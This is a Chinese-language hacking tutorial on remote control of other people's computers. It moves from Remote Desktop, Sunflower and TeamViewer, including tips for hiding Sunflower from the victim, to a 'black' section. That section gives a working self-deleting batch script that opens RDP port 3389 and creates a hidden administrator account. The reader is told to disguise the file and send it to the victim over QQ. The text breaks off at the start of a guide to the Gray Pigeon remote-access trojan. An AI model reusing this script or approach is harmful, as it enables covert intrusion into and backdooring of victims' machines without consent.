绿色远控

一、电脑自带的远程桌面

Windows系统的电脑都会自带远程桌面的功能，这里以windows7为例。打开方法有以下两种：

1.win+R调出运行窗口————输入mstsc；

2.win7的开始菜单直接搜索远程桌面，或者win8/10系统按住win+Q搜索远程桌面。

输入对方的ip地址即可进行连接，输入账户密码即可以登录主机使用。

局限性：这种方法虽然简单稳定，但是前提是对方要在我的电脑————属性————远程控制————勾选允许运行任意版本的计算机连接（也就是开启3389端口，后面会教你如何用命令开启他人的3389端口）；另外，这种连接只能用于局域网的主机。

优点:方便稳定，尤其是在校园网中，不需要拨号只要插上网线都可以连接。因为学校的网线都是在学校的内网下，属于同一个局域网。

二、第三方软件

除此之外，也可以用第三方软件。比如：

1.向日葵：这款软件是最近都非常火的一个远控软件，只要对方连网都可以进行远程控制，界面设计好看，主要用于个人对家庭设备的集中管理。但是缺点也很明显：必须在对方的电脑安装向日葵服务端，且需要登录你的向日葵账号，隐蔽性差！；连接的时候需要输入对方电脑的账户密码，或者对方向日葵的临时密码。当然也是有优点的：可以设置软件仅以服务运行，这样被控端在任务管理器中就发现不了你的远控软件了；免费，且可以在手机上使用，非常方便。

所以说只要你有足够的时间去接近和使用别人的电脑就可以轻松在上面安装一个控制软件，让他成为你的肉鸡。但是前提是除了亲近的人，谁又会愿意让你一个人玩他的电脑呢。。。

2.teamviewer：这款软件主要用于商务活动，功能很强大，主要用于远程会话。缺点是：完全不能隐蔽；双方必须联网；双方必须都装有teamviewer软件。

一般来说，网上能够下载的官方远控软件都是跟上述的两个大同小异。作为个人的设备集中管理非常方便好用，但是不能作为攻击工具去入侵别人的电脑。下面将会介绍几款黑色远控！

黑色远控

一、远程开启3389.

将以下这段代码复制到一个记事本中重命名为control.bat（查看后缀名，在文件夹选项中开启）

@echo off echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg net user friend$ hack /add net localgroup administrators friend$ /add del 3389.reg del control.bat

然后伪装图标等等之后通过qq发给对方，对方双击后，文件会自动运行并且删除，然后要是你们是局域网的话就可以开始愉快的远控了。

二、黑产远控软件的使用

灰鸽子

步骤：

先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的